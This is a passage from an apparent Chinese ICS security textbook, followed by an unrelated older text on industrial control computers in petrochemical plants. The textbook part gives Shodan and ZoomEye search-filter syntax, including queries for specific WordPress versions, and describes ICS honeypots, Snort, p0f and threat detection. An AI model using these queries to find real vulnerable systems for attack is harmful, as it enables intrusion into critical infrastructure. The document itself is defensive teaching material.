想要了解每个条目的具体信息,只需要点击每个条目下方的 details 按钮即 可。此时, URL 会变成这种格式 https://www.shodan.io/host/ [IP],所以我们也可以通过直接访问指定的 IP 来查看详细信息。 我们可以从顶部在地图中看到主机的物理地址, 从左侧了解到主机的相关信息,右侧则包含目标主机的端口列表及其详细信息。如果像前面单纯只使用关键字直接进行搜索, 搜索结果可能不尽人意, 那么 此时我们就需要使用一些特定的命令对搜索结果进行过滤, 常见用的过滤命令如下所示: hostname:搜索指定的主机或域名,例如 hostname:"google" port:搜索指定的端口或服务,例如 port:"102" country:搜索指定的国家,例如 country:"CN" city:搜索指定的城市,例如 city:"BeiJing" org:搜索指定的组织或公司,例如 org:"google" isp:搜索指定的 ISP 供应商,例如 isp:"China Telecom" product:搜索指定的操作系统/软件/平台,例如 product:"Apache httpd" version:搜索指定的软件版本,例如 version:"1.6.2" geo:搜索指定的地理位置,参数为经纬度,例如 geo:"31.8639, 117.2808" before/after:搜索指定收录时间前后的数据,格式为 dd-mm-yy,例如 before:"11-11-15" net :搜索指定的 IP 地址或子网,例如 net:"210.45.240.0/24" 此外, Shodan 还为研究者提供了 API 开发接口,支持各种主流编程语言,研究者可以利用 API 更加方便的进行信息检索。 8.2.2 Censys Censys 是由密歇根大学的科研人员发布的一款网络空间搜索引擎, 它允许计 算机科学家了解组成互联网的设备和网络。Censys 由因特网范围扫描驱动, 它使 得研究人员能够找到特定的主机, 并能够针将设备、网站和证书的配置和部署信息创建到一个总体报告中。 与 Shodan 不同的是, Censys 所有搜索结果都能免费提供, 但通过 Web 页面 只提供前 10000 条结果, 多于 10000 条需要通过调用 API 的方式获取。更为令人 兴奋的是, Censys 还免费提供原始扫描结果数据下载, 如图 8.9 所示。如果感兴趣的话,甚至可以在网上找到 Censys 的扫描源代码。 8.2.3 ZoomEye ZoomEye 是一款针对网络空间的搜索引擎, 收录了互联网空间中的设备、网 站及其使用的服务或组件等信息。ZoomEye 拥有两大探测引擎: Xmap 和 Wmap , 分别针对网络空间中的设备及网站,通过 24 小时不间断的探测、识别,标识出 互联网设备及网站所使用的服务及组件。研究人员可以通过 ZoomEye 方便的了 解组件的普及率及漏洞的危害范围等信息。虽然被称为“黑客友好”的搜索引擎, 但 ZoomEye 并不会主动对网络设备、网站发起攻击,收录的数据也仅用于安全研究。 ZoomEye 更像是互联网空间的一张航海图ZoomEye 和 Shodan 的区别是 ZoomEye 目前侧重于 Web 层面的资产发现而 Shodan 则侧重于主机层面,目前 ZoomEye 共收录了 132,122,600 个站点,400,000,000 个设备, 7,942 个组件。比如我们以当前使用量世界第一的 Blog 应用 Wordpress 作为关键字分别进 行搜索。使用 Shodan 搜索到了 3 万多条记录,而使用 ZoomEye 搜索到了 30 多 W 条记录且结果吻合度非常高。除了最普通的关键词搜索, ZoomEye 目前还支持 对 Web 应用指定版本号,比如我们想搜索使用 wordpress 3.5.1 版本的网站,输 入搜索短语 wordpress:3.5.1 即可。同样我们还可以对国家和城市进行限定, 比如 输入 wordpress:3.5.1 country:cn city:beijing 能够搜索到主机位于中国北京且使用wordpress 3.5.1 版本的网站。该搜索引擎目前正在逐步完善, 更多功能也在逐步添加当中, 目前已经整合 了全球 4100 万网站的网站组件指纹库,数据量相对可观,后期会继续扩充。在 搜索框中可以搜索你关心的网站组件, 比如 discuz、dedecms,比如 nginx、apache,甚至你搜 hacked by 也能得到一些亮点。 8.2.4 其他网络空间搜索引擎 傻蛋联网设备搜索是一款监测互联网基础设施安全威胁并评估其安全状况 的产品, 它能自动发现网络设备、服务器设备、工业控制设备等所有互联网基础 设施, 识别和收集这些设施的指纹信息, 检测其是否存在安全威胁, 评估其安全 状况; 一旦出现新安全事件, 可基于大数据处理技术, 重新计算和评估基础设施的安全性, 并预测新漏洞的影响范围。产品布署在互联网上, 为互联网用户提供网络安全威胁搜索、网络安全监测、网络安全加固等网络安全服务。 东北大学计算机学院姚羽教授组织学生编写研发——谛听(ditecting)网络 空间工控设备搜索引擎, 取谛听辨识万物之意, 意在搜寻暴露在互联网上的工业 控制系统联网设备, 帮助安全厂家维护工控系统安全、循迹恶意企图人士。通过 谛听, 你可以定位工控设备位置, 捕捉开放端口, 发现安全漏洞。通过谛听, 你 可以直观感受全球工控安全形势, 关注你身边的工控系统安全。谛听旨在为工控 安全提供开放自由的研究环境, 善用谛听, 关注工控系统安全, 促进工控安全发展。 第九章 工业控制网络威胁数据采集 互联网从诞生以来, 一直遭受着网络攻击与恶意代码的威胁。随着攻击技术 的不断发展, 新形态的安全威胁不断涌现并在持续进化, 而防御技术并不能及时 跟上安全威胁的变化步伐, 这使得互联网的安全状况日益恶化。究其根源, 会发 现攻击方与防御方之间在进行着一场不对称的技术博弈: 攻击方可以在夜深人静 时只要找到攻击目标的一个漏洞就能够攻破系统, 而防御方必须确保系统不存在 任何可被攻击者利用的漏洞,并拥有全天候的监控机制,才能确保系统的安全; 攻击方可以利用扫描、查点等一系列技术手段, 全面获取攻击目标的信息, 而防 御方即使在被攻陷后仍然很难了解到攻击的来源、方法和动机; 一旦博弈失败, 由于安全响应技术与协调机制的欠缺, 在很多情况下, 攻击方不会遭受任何损失,而防御方却通常将面临系统与信息被破坏或窃取的风险。要想扭转这种信息不对称的局面, 网络防御方必须采取措施, 主动采集网络威胁数据,利用数据来对网络攻击者进行分析和监测。 9.1 工业控制蜜罐 蜜罐(honeypot)就是一项用来采集攻击数据的主动防御技术, 它定义为一 类安全资源, 没有任何业务上的用途, 其价值就是吸引攻击方对它进行非法使用。 蜜罐技术本质上是一种对攻击方进行欺骗的技术, 通过布置一些作为诱饵的主机、 网络服务或者信息, 诱使攻击方对它们实施攻击, 从而可以对攻击行为进行捕获 和分析, 了解攻击方所使用的工具与方法, 推测攻击意图和动机, 能够让防御方 清晰地了解他们所面对的安全威胁, 并通过技术和管理手段来增强实际系统的安全防护能力。20 世纪 80 年代末蜜罐技术在网络安全管理实践活动中诞生以来, 就赢得了 安全社区的持续关注, 并得到了长足发展与广泛应用。针对不同类型的网络安全 威胁形态, 出现了丰富多样的蜜罐软件工具。在网络安全威胁监测研究与实际网 络安全管理实践中, 利用蜜罐采集的网络威胁数据大量应用于网络入侵与恶意代码检测、恶意代码样本捕获、 攻击特征提取、取证分析、追踪溯源等多种用途。工业控制系统蜜罐通过模拟工业控制通信协议伪装成真实的工业控制系统,能够记录入侵者对工业控制系统的网络探测与攻击数据。 Conpot 是一个低交互蜜罐工业控制系统蜜罐,它模拟具有 Modbus 和 S7comm 协议连接的西门子 SIMATIC S7-200 PLC。它的默认设置能够延伸到模拟其 他使用专有 S7comm 协议的西门子 PLC。但是 S7comm 协议的实现是相当不完整 的,它只能读取系统状态列表(SSL)的条目。默认配置下, Conpot 添加了两项 标识了西门子 PLC 的型号和版本的条目, 一个真正的西门子 PLC 有差不多 1000个这些条目,缺失的那些使对手很容易识别 Conpot。 CryPLH 模拟了一个 S7-300,作者认为 CryPLH 是一个高交互蜜罐,其明确目 的是提高交互性、可配置性和不可区分性。 CryPLH 再现了一个看起来与真实界 面完全相同的 PLCWeb界面的静态副本。登录被禁用以便对手无法访问状态信息。 CryPLH 提供 SNMP 服务,标识为 PLC 并提供从主机操作系统获取网络统计信息 的功能。对手甚至可以使用西门子的 SIMATIC STEP 7 软件连接到 CryPLH。但是, CryPLH 模拟 S7-300 PLC 的最高保护级别, 并且拒绝任何提交的密码。因此,CryPLH 阻止了对手的进一步探索。由于对手既不能观察也不能修改 PLC 应该运行的程序, CryPLH在我们的分类方案中仍然被归类为低交互。然而,通过 Nmap获取的TCP/IP操作系统指纹与真正的 PLC 不同,这使得 CryPLH 可以容易地被对手识别为蜜罐。 灯塔实验室运营人员显然有 PLC 蜜罐。由于他们没有发布他们的蜜罐配置或 其功能描述,我们只能从他们发布的蜜罐日志做出推论。他们的日志类似于 Snap7 输出,并在 SSL 中显示许多对标识条目的请求, 其中大多数请求源自 Shodan 和 Censys。一个连接查询其他 SSL 条目和一些程序及数据块, 工程工作站可能被 使用了, 另一个查询单个配置数据块和一些不寻常的 SSL 条目。他们提到三次尝 试的攻击:对手试图停止程序执行,修改内存区域和调整系统时钟。总的来说, 灯塔实验室的蜜罐似乎比我们之前讨论过的两种蜜罐允许更大的交互性, 但是仍 然不支持与模拟 PLC 程序的交互。基于这个有限的信息, 我们将他们的蜜罐分类为低交互。 DT 实验室的 DemonTrace 是一款工业控制系统高交互蜜罐, 它支持 S7comm、 Modbus、BACnet、IEC104、DNP3、HTTP、kamstrup 协议。不同于 Conpot,DemonTrace 支持与攻击者进行深度交互,能够模拟真实 PLC 回复攻击者的每一次数据请求,逐步诱导攻击者由低级别的扫描探测到发起高级别的网路攻击。 9.2 其他采集技术 9.2.1 Snort 1998 年, Marty Roesch 用 C 语言开发了开放源代码的入侵检测系统 Snort 。 到今天, Snort 已发展成为一个多平台实时流量分析, 网络 IP 数据包记录等特性 的强大的网络入侵检测/防御系统。Snort 有三种工作模式: 嗅探器、数据包记录 器、网络入侵检测系统。嗅探器模式仅仅是从网络上读取数据包并作为连续不断 的流显示在终端上。数据包记录器模式把数据包记录到硬盘上。网络入侵检测模 式是最复杂的, 而且是可配置的。我们可以让 snort 分析网络数据流以匹配用户定义的一些规则,并根据检测结果采取一定的动作。 Snort 能够对网络上的数据包进行抓包分析,但区别于其它嗅探器的是,它 能根据所定义的规则进行响应及处理。 Snort 通过对获取的数据包, 进行各规则 的分析后,根据规则链,可采取 Activation(报警并启动另外一个动态规则链)、 Dynamic(由其它的规则包调用)、Alert(报警),Pass(忽略),Log(不报警但记录网络流量)五种响应的机制。Snort 有数据包嗅探,数据包分析,数据包检测,响应处理等多种功能,每 个模块实现不同的功能, 各模块都是用插件的方式和 Snort 相结合, 功能扩展方 便。例如, 预处理插件的功能就是在规则匹配误用检测之前运行, 完成 TIP 碎片 重组, http 解码, telnet 解码等功能, 处理插件完成检查协议各字段, 关闭连接,攻击响应等功能,输出插件将得理后的各种情况以日志或警告的方式输出。 9.2.2 p0f p0f 是一款远程操作系统被动判别工具, 能够通过捕获并分析目标主机发出的数据包来对主机上的操作系统进行鉴别。它支持: 反连 SYN 模式 正连 SYN+ACK 模式 空连 RST+ 模式 碎片 ACK 模式 p0f 比较有特色的是它还可以探测: 是否运行于防火墙之后 是否运行于 NAT 模式 是否运行于负载均衡模式 远程系统已启动时间 远程系统的 DSL 和 ISP 信息等 9.3 工业控制网络威胁数据应用 9.3.1 工业控制网络恶意代码检测 恶意代码攻击是信息战、网络战最重要的入侵手段之一,震网事件就是恶意 代码的一次典型案例, 恶意代码问题无论从政治上、经济上, 还是军事上, 都成 为工控系统网络安全面临的首要问题。利用工业控制网络威胁数据可有效开展网 恶意代码检测, 主要方法可以归结为两种: 基于特征码的检测方法和基于行为的检测方法。基于特征码的检测方法取决于模式识别, 该方法不考虑恶意代码的指令意义, 而是分析指令的统计特性、代码的结构特性等。比如在某个特定的恶意代码中, 这些静态特征数据会在数据的特定位置出现, 所以完全可以使用这些静态特征和其在数据中出现的位置作为描述恶意代码的特征。工作原理如下: 提取数据包的固定字节序列, 并与特征库中的信息字节码进 行比较, 如果该模式与苦衷相匹配, 就会被认为是恶意代码。这种方法很容易通 过代码变换技术绕过, 但是同一恶意代码变换后都具有一定的同源性, 可以利用数据挖掘和机器学习等大数据和人工只能方法来检测恶意代码的同源性。新的恶意代码每天都在产生, 基于特征码的检测方法无法有效防御新的或未 知的恶意代码, 从而要求特征库要保持更新, 而很多恶意代码的定义都需要人工来完成。 基于行为的检测方法是通过监视恶意代码是如何运行, 如果发现有异常行为, 就标记为恶意代码。但是工业生产环境要求无损, 绝不可能让不确定的代码在工业控制系统中运行。工业控制系统中的行为检测要求不运行恶意代码本身, 而是考虑构成恶意代码的工业控制协议功能码的含义, 通过理解功能码含义建立恶意 代码的流程图和功能框图, 进一步分析恶意代码的功能结构。在该技术的分析过 程中首先参照工业控制协议对数据包进行解读, 通过这种技术可以得到恶意代码 的所有功能特征, 如收发网络数据、响应每个触发事件、文件读写操作等, 根据这些行为可以判断该代码是否是恶意的。 9.3.2 工业控制网络攻击特征提取 网络攻击都具有一定的特征, 工业控制网络攻击也不例外, 根据网络攻击特 征可以有效检测并阻止网络攻击。常见的工业控制网络攻击特征有: 基于时间序 列的特征、基于端口序列的特征、基于功能码序列的特征、基于参数序列的特征等。基于时间序列的特征: 事件序列也称为动态序列, 由一组随时间变化的观测量组成,描述事物随时间变化的过程。基于端口序列的特征: 端口序列指的是工业控制系统中开放网络端口的有序 列表,例如, 一个攻击者尝试连接到 80 端口,然后连接到 8080 和 1080 端口,则该攻击会话的端口序列特征就是80-8080-1080。基于功能码序列的特征: 功能码序列是指同一攻击会话所使用的工业控制协议中的功能码按照时间先后顺序组成的序列。基于参数序列的特征: 参数序列是指同一攻击会话所使用的工业控制协议中的参数值按照时间先后顺序组成的序列。其他特征: 如流量特征、数据包载荷特征、操作系统指纹特征等, 均可以作为辅助特征参与网络攻击检测。 9.3.3 工业控制网络安全威胁追踪与分析 网络攻击都包含很多步骤, 例如,许多攻击者都是从扫描开始, 接着是枚举, 但后针对枚举的账户尝试进行认证, 或者开始检测系统能够中是否存在漏洞。网 络安全威胁追踪与分析就是将上述步骤产生的大量的离散时间数据关联成一个整体进行分析,前面讨论的检测技术在单独使用时都会分析提供有价值的证据。常用的安全追踪方法有 IP 地址地理位置查询, IP 地址绑定域名查询,域名 whois 信息查询, 域名绑定邮箱查询与同一邮箱其他域名信息查询, 操作系统检测,软件同源性检测等。 IP 地址地理位置信息查询可以使用 GEOIP 库,该库免费版可以到网站https://www.maxmind.com/en/geoip-demo 下载,通过该数据库能够定位到国家、 城市、经纬度等地理位置信息。国内的 IPIP.net 以一个基于 BGP/ASN 数据分析处 理而得来的 IP 库, 相对于 GEOIP 库, IPIP 能提供更加准确的地理位置信息, 但是需要付费查询。Whois 是用来查询域名的 IP 以及所有者等信息的传输协议。简单说, whois 就是一个用来查询域名是否已经被注册, 以及注册域名的详细信息的数据库(如 域名所有人、邮箱、地址、联系电话、域名注册商)。有些注册商,对国际域名 的 whois 信息是屏蔽的, 如果要查询只能联系对应的注册商。这种保护机制是防 止有人恶意利用这种 whois 信息的联系方式,暴露客户的隐私信息。国内提供whois 信息查询的网站有站长之家,万网等。 9.3.4 工业控制网络安全态势感知 “态势感知(Situation Awareness ,SA)”是一种基于环境的、动态、整体地 洞悉安全风险的能力, 是以安全大数据为基础, 从全局视角提升对安全威胁的发 现识别、理解分析、相应处置能力的一种方式, 最终是为了决策与行动, 是安全 能力的落地应用。“态势感知”最早在 20 世纪 80 年代被美国空军提出, 覆盖感 知、理解和预测三个层次。 90 年代,概念开始被广泛接受,并随着互联网的兴 起而升级为“网络空间态势感知(CyberspaceSituation Awareness ,CSA)”,是指 在大规模网络环境中能够引起网络态势发生变化的安全要素进行获取、理解、显 示, 以及趋势预测分析从而支撑决策的系列活动。近年来, 随着大数据技术的兴起,态势感知技术也正逐渐成为信息安全技术中的一个新的门类。工业控制网络的态势感知技术是态势感知技术在工业控制系统中的落地。如 前文所述, 工业控制网络与传统信息网络不论是在软硬件架构, 还是安全性需求 方面都存在较大差异, 而态势感知技术本身又属于新兴的技术门类, 因此将态势感知应用于工业控制网络这样一个全新业务领域, 必然会产生一些独特的特点和规律。 承载着关键信息基础设施的工业企业网络, 一般会划分为信息管理网络和生 产控制网络两部分, 该两部分网络具有: 彼此严格隔离和协议类型完全不同(传 信息网络协议、工业以太网协议) 的特点。这就造成了工控安全态势感知技术的如下关键特征。 生产控制网络与信息管理网络独立信息采集 由于工业企业信息管理网络与生产控制网络严格隔离, 所以信息采集工作须 从该两个网络分别着手。对于生产控制网络而言, 应着重考虑内部资产(如 PLC 、 DCS 、RTU 等) 的品牌类型、软硬件版本等, 以及内部恶意行为等信息的采集工 作; 对于信息管理网络来说, 应着重考虑外部恶意行为, 以及内部资产非法外联等信息的采集工作。 工业协议数据采集 工控网络态势安全态势感知技术应该主要用于监测工业控制网络安全状况 和变化趋势, 并支撑相应应急响应机制建设。这就要求该技术主要基于工业协议 (如 Siemens S7 、Modbus 、Bacnet 、Ethernet/IP 等)来开展各种维度的监测、分析等工作。 主被动采集手段相结合由于工业控制网络安全等级要求很高, 一旦操作不当可能会操作物理伤害, 所以不同于传统信息网络, 在信息的采集过程中要首要考虑采集会否影响工业生 产系统本身安全性, 所以建议使用主被动结合采集□手段, 并且优先使用被动采集手段。 工业控制网络安全知识库为核心 知识库作为工业控制网络安全态势感知技术的核心模块, 应该主要包含工业 控制设备(如各品牌 PLC 、RTU 、IED 等)指纹库、工业控制网络恶意行为指纹 库(比如, 支持 Siemens S7 、Modbus 、Bacnet 、Ethernet/IP 等协议)、工业控制网络恶意组织指纹库、工业控制网络漏洞库等专业知识库。 信息采集重点与行业特点相关性很强 不同行业的工业企业的生产控制网络结构差异化较大, 在进行基础采集探针部署阶段, 要进行针对性的调整。比如, 电网、燃气等应用 SCADA 较多的行业,可重点考虑工业设备非法外联监测和外部威胁监测; 石油炼化、先进制造等应用DCS 较多的行业,则可重点考虑外部威胁监测和内部威胁监测。 数据接入层: 实现数据的接入功能, 通过开放的互联网资源接入到开放联网 的工业控制系统; 基于企业工业控制系统流量入口的数据采集系统, 通过镜像接获取局域网通信流量数据。 数据采集与清洗层: 实现工业控制设备及企业工业控制网络入口流量数据的采集与清洗功能,通过主动探测对工业控制设备进行识别。 数据存储与索引层: 实现探测数据、监测数据及知识库资源的数据汇聚、存储及索引功能,提供开放接口供数据建模层进行数据获取。 数据建模与分析层: 实现数据的关联分析, 深入分析工业控制网络标识信息、 工业控制系统资产信息、攻击事件和攻击源头信息, 进行威胁态势展示和数据关联挖掘。 数据理解与可视化层: 对标识态势、攻击源、攻击事件和工控资产的态势进行可视化展示,并通过可视化界面进行数据关联查询。 工业控制网络安全态势感知服务必须根据工业企业不同业务特征和需求进 行定制, 提供针对其生产控制网络的威胁、脆弱性信息, 并根据知识库的各种工 业指纹库, 进行综合分析处理, 形成针对目标工业控制网络的整体安全状况以及变化趋势,支撑响应工业企业安全保障机制建设。
standards
工业控制计算机使用技术 第一章 总 论 第一节 工业控制计算机系统概述 电子计算机用于炼油、化工生产过程进行监督、控制,是属 于实时控制范畴的。如果计算机的计算结果直接改变常规调节器 的给定值,或直接送往执行器去控制生产过程,此种控制方式称为“闭环控制”或“在线控制”。如果计算机的计算结果仅为生产 管理人员作为指导生产的参考,而控制生产还是在人的指挥下, 定期或不定期地进行计算和控制,此种控制方式称为“开环控制 或“离线控制”。 炼油、化工生产过程如果采用计算机控制,由于生产过程的 复杂、生产过程的连续性和各装置间的相互关联,采用一台计算 机控制整个生产过程较困难,并且,对计算机可靠性的要求也越 来越高。因此,目前生产过程多采用分级计算机控制系统。它一 般分为以下三级: 1。直接数字控制(DDC) 电子计算机可以取代一般模拟调节器,对生产直接进行控制;由于其控制信号是数字 量,故称为直接数字控制。 一般用于多个回路,相当 于一台多回路数字调节装置 。 它不仅能实现PID 调 节规律,而且也能灵活地、 有效地实现各种新型调节 规律,诸如前馈、选择性、大滞后、解耦等,以至于最佳及自适应控制方式。在 PID 调节中,还能自动优选PID 参数,并能同时实现顺序控制等功能,使 其控制效果可比一般模拟调节器大为改善。 2. 监督计算机控制系统 (SPC 或SCC) 该系统中,电子计算机按照过程的数学模型,计算出生产过 程参数的最佳给定值,作为过程控制的依据,对模拟调节器予以 整定或由下一级计算机进行直接数字控制 3。计算机管理系统 这一系统基本上是进行全厂一级的综合生产控制、数据处理 和经营管理。它对SCC ( 或SPC) 系统进行监督管理。 第二节 工业控制机简介 一般把用于工业控制的电子计算机叫做工业控制机(简称控 制机)。工业控制机除了具备通用计算机的常用外部设备外,还需 要配备与生产过程相联系的过程输入输出通道,即外围设备。由 于工业控制的特殊要求,希望计算机具有以下特点: 1. 高可靠性 因为一般工业生产为连续生产,这就要求故障率低。希望计算机平均无故障运行时间(MTBF) 不得小于数千 小时,最好能达上万小时。同时也希望平均修复时间 (MTTR)短些。 2。环境的适应性 多数计算机在工业生产过程中使用时,将 会遇到如强电流、强磁场的干扰,腐蚀性气体以及没有完善的空 调系统等恶劣环境。因此,在系统设计时必须考虑这些因素。 3. 实时性 生产过程都有实时性的要求,如观察现场工况的各种参数,修改操作条件,以及紧急事故处理等,需要随时进行 处理。为了满足这些要求,工业控制机必须配有时钟,并有较完善 的中断系统 。 4. 要有较完善的过程通道设备(即外围设备) 工业控制机 除配有一般计算机的通用外部设备,如纸带输入机、打字机、磁 鼓等,还需配有专用的外围设备。 一般应具有模拟量输入、输出,开关量输入、输出,脉冲量输入以及人机联系的工艺操作台(包 括数据设定,数据显示,越限报警等),最近又出现了以CRT 屏 幕显示器为中心的操作站。因此要求有较完善的输入输出指令和 逻辑判断指令。 5. 某些技术指标可比大型通用机低,如字长较短, 一般为 16位到24位。速度较慢,每秒几万次以上一般即可满足要求。内 存容量较小, 一般为4K~64K 。 但随着控制水平的发展和提高, 这些要求也会不断提高。而且不同应用场合,要求也不一样。所 以在选用计算机时要根据具体应用对象及使用方式,选取合适的计算机。 从上述可看出,工业控制机应由如下部分组成:计算机本体 (运算器、控制器、存贮器),外部设备,过程通道和工艺操作台 等. 目前常用的工业控制机性能见附录一。 第三节 石油化工生产过程应用计算机实例 一、某炼油厂常减压装置控制用电子计算机(一) 该装置使用二台电子计算机, 一台是日制HOC-510 机,另一 台是JS-10A 机。双机组成分级控制系统。JS-10A 机作直接数字 控制(DDC), 有近100个检测报警点和28个回路的控制点,HOC- 510机作高一级的监督控制(SCC)。JS-10A 是一种较小的工业控制机。没有汇编语言,编制程序 不方便。指令系统简单,程序所占内存单元较多,作28个回路直 接数字控制,4K 容量感到紧张。机器运算速度慢,仅3万条指令/秒,作为28个回路直接数字控制,调节周期为2.5秒,对流量 回路来说,显得长一些。机器未设置代码传送时的奇偶校验电路, 查找故障较困难。但该机结构简单、功能少,因而便于掌握和 维护。HOC-510 机指令系统及所配软件较完善,编制修改程序较方 便。该机作为全装置监督控制,8K内存容量显得不够。 二、某炼油厂常减压装置控制用计算机 (二) 该装置使用JDK-331 工业控制机,对1号蒸馏装置进行航空 煤油生产的多参数前馈和比重反馈以及常压塔物料平衡等项目 控制。 JDK-331 机内存容量为8K, 随着数学模型的日益完善,感 到容量不足。该机外部设备未配置控制打字机,人机联系不太 方便。 三、某化肥厂合成氨生产控制用电子计算机(一) 该装置使用沈阳自动化所等单位制造的小型工业控制机。对 六套合成系统主要控制点进行控制,已投入运行的有六个塔的触 媒层温度、蒸发器温度等256个检测点,7个监督控制,6个直 接数字控制。 机器字长13位,计算精度低。有些重要数据要求精度高,如 产量计算,要求有效数字5位,必须采用双倍字长运算才能达到 精度要求,这样既占运算时间又占内存容量,13位字长是不能满 足工业控制需要的。另外,该机内存容量太小(4K), 给软件工作 带来一定困难。机房氨气浓度较高,对机器印刷电路板铜铂有腐蚀,采用喷 涂绝缘漆防护,有一定效果。该机器采用国产早期半导体元件, 元件质量较差,电源稳定性能差,接插件接触不良,经过更换和 改造,机器已趋稳定运行,平均无故障运行时间可达数千小时。 四 、某化肥厂合成氨生产控制用电子计算机 (二) 该装置采用ARCH-1000 计算机一台,对合成氨系统气化部 分、合成部分进行控制,有100个检测点和16个控制点。主要进 行氧/油比、蒸汽/油比、氢/氮比等综合自动控制。该机原为一台数据处理机。经过改造,成为小型工业控制机。 运算速度低(加法,4000次/秒),对于生产过程多回路控制,不 太适合。同时内存容量小,对扩大控制回路和实现最优控制满足 不了需要。无外存贮器,使用不方便。指令系统简单,编制程序 较复杂。采样系统采用的湿簧继电器,速度较低(10/秒),但可靠性高,对某些控制点少,速度要求不高的场合还是合适的。 五、某化工厂综合控制系统 该厂配有TQ-3 、YJ-1 、TQ-1 三台计算机。TQ-1 机对醋酸 乙烯合成Ⅱ系列反应器进行直接数字控制,并进行了一些数学模 型的试验工作。目前正准备进行三级控制。 TQ-1 机内存容量小(4K), 不能满足数学模型工作的需要。 内存和外存数据交换,该机需停机进行,使用不太方便。直流电 源易出故障,需进一步提高机器可靠性。 六、某化工厂乙烯装置裂解炉控制用计算机 该厂使用一台日制 M-5F 工业控制机,实现乙烯装置裂解工 段6台裂解炉的出口温度的稳定控制。对6台裂解炉72个控制点 实现监督控制。该机稳定可靠,平均无故障运行间隔时间为数千小时。外部 设备较全,使用方便。但机器原设计的控制功能仅局限在裂解工 段的裂解炉控制,内存未留余量,对扩大控制范围有困难。 第四节 国内外工业控制机发展展望 随着生产过程的不断发展,模拟仪表在使用上出现了一些问题。 1. 随着生产水平的提高,要求自动控制系统除进行一般的 PID 调节外,还能够进行一些新型规律的调节,如前馈调节、选 择性调节、纯滞后调节、计算值调节、解耦调节、自整定调节、 适应调节、时间最优调节等等。对此,模拟仪表实现起来比较困 难,已不能适应需要。而计算机则可以简单、方便地胜任各种传 递函数的调节规律。 2. 随着生产规模的扩大,仪表的数量大量增加,使仪表盘 长达几十米,操作日益困难。而计算机可以集中操作和监视。 3。随着计算机应用的发展和生产管理水平的提高,要求对 生产过程自动地收集现场的数据,并与上级管理计算机自动进行 经常地、及时地进行数据交换。模拟仪表也难以胜任这一要求。 以前的计算机集中控制系统,也存在一些问题: 1。由于功能过于集中, 一旦计算机出现故障,则影响全局。 即可靠性较差。 2。随着计算机控制系统集中程度的提高,现场信息收集的费 用也不断增高。 3。计算机集中控制与模拟仪表在技术上、使用上都有很大 的差别,当屏幕显示技术尚未广泛使用于计算机集中控制系统 时,人机联系不直接,不直观,与广大操作人员的操作习惯和操 作水平不相适应,也影响了它的推广使用。从七十年代后期起, 屏幕显示设备(VDU-Visual Display Unit, 也称为直观显示部 件,因目前多数使用阴极射线管Cathode-Ray Tube作为显示元 件,故有时称为 CRT) 逐渐广泛地使用于计算机控制系统,人 机联系更为直观了。但集中型计算机系统仍然有系统设计复杂、 配线复杂、系统可扩展性和灵活性差、维护较麻烦、应用软件研 制的工作量大等缺点,从而影响了它的推广使用。 近几年来,大规模集成电路技术高速发展,不断成熟,使计 算机的微型化已成为现实。由于微处理机具有价格低廉、可靠性 高、小型、轻便,以及功耗低等显著优点,同时也使应用软件的 硬件化成为可能,使计算机的使用更为方便。因此微处理机的生 产和使用不断扩大。在生产过程控制系统中,可以分散地采用微 处理机作为局部控制的核心。同时,由于数据通讯技术的发展与 成熟,使各台计算机之间可以方便地、可靠地互相通信息。由于 屏幕显示技术的发展,人机联系更为方便,利于集中操作与监 视。这些条件的成熟,使得以微处理机为核心的分散型综合控制 系统(或称分布式系统)形成并很快地发展起来了。在这种系统 中, 一台微处理机可用作8~32个回路的控制,整个系统由若干 台微处理机组成,相互之间由通讯线路相连接,组成一个计算机 网络。当一台微处理机出现故障时,可以自动切换到模拟仪表或 由其它微处理机进行控制,大大提高了系统的可靠性。同时也可 以由中、小型的上位计算机对整个系统进行监督和管理。与上位计算机相连接的中央操作站,可以通过一台或数台屏幕显示器对 整个系统的各类参数方便地进行监视和操作控制。其中屏幕显示 器(VDU) 可以提供任何预定时刻的系统的信息(如外部存贮中 的情况、报警信号的随时显示等),其显示画面将不断标准化(如 在画面的信息量、画面设置方案、标尺色彩、操作性能等方面趋 于标准化),并出现系列化的产品,以适应不同的需要。进一步 还将逐步智能化,即将微处理机装于VDU内,以代替控制计算 机的一部分计算和控制功能。而且显示画面有多种,可满足不同 级别的操作的要求。如可有对全部控制回路的情况所作的“全貌 显示”(或称“标签显示”)、对某组控制回路情况所作的“分组 显示“(或称“操作画面”)、对某个特定回路的各种参数的“细目 显示”(或称“调整画面”)、对系统通讯状态的参数的显示(“HW 显示”)以及反映某些特定工艺参数变化情况的“趋势显示”等 等。这样只用一台VDU 就可以灵活地适应各种操作观察和控制 的需要,使得人机联系极为方便。 显而易见,这种以微处理机为核心的分散型综合控制系统能 较好地解决模拟仪表和计算机集中控制系统所面临的那些困难。 有人称这类系统为四C 技术的综合(即计算机Computer, 控制 Control, 通讯Communication 及 CRT) 。 可以预见,这种新型 的控制系统必将获得更大的发展和日益广泛的应用。 随着计算机技术的迅速发展,在硬、软件方面的各种新成 就,也将不断应用到计算机控制系统中来。例如为了提高系统软 件的可靠性,在微型机系统中广泛采用了大规模集成的只读存贮 器(ROM-Read-Only Memory)片子,从硬件上保证了系统软 件的内容不会被破坏。当有修改程序的必要时,又发展了可编程 序只读存贮器(PROM-Programmable ROM),进一步又有光可 改写(使用紫外光对ROM 进行改写)和电可改写等PROM。 这 样,既保证了可靠性,又满足了灵活性的要求。此外,作为计算 机控制系统与现场信息的一种接口装置,近来发展了一种工业过 程控制子系统的“数据收集处理装置”。其内部装有微处理机,功能包括收集现场信息、进行必要的标度变换和必要的计算、进行 模/数转换以及多点开关量转接、传输等。这样的子系统可以大 大减轻计算机I/O (输入/输出)单元的负担,并使得现场到计 算机之间的接线大大减少。由于信号的传输是以数字量的形式进 行的,因此大大提高了信息的精度和抗干扰的性能。此类系统可 以在需要的场合配合计算机控制系统进行使用。在某些以微处理 机为核心的分散型综合控制系统中,已有类似的产品出现。 目前,计算机数据库系统正在迅速发展,使得人们通过计算 机使用大量的数据时效率更高、可靠性更好、更为方便。在工业 控制方面,当需要较高度地进行集中管理时,数据量也是相当大 的。可以预见,蓬勃发展的数据库技术将会有效地用于需要高度 集中管理的计算机控制系统中去。 目前计算机数据通讯技术的发展,已利用了人造地球卫星来 进行远距离的数据通讯。我们相信,工业控制计算机系统也将会 利用这一技术发展来进行远距离的数据信息交换和控制、管理。 在软件方面,与工业控制有关的发展包括: 1. 尽量使应用程序标准化、结构积木化、模块化,以减少 应用程序的研制费用,利于推广应用。并且在此基础上,发展出 较成熟的应用软件包,即除了模块化的标准应用程序之外,还配 有生成系统(即通过选取不同的应用参数,自动产生出适应不同 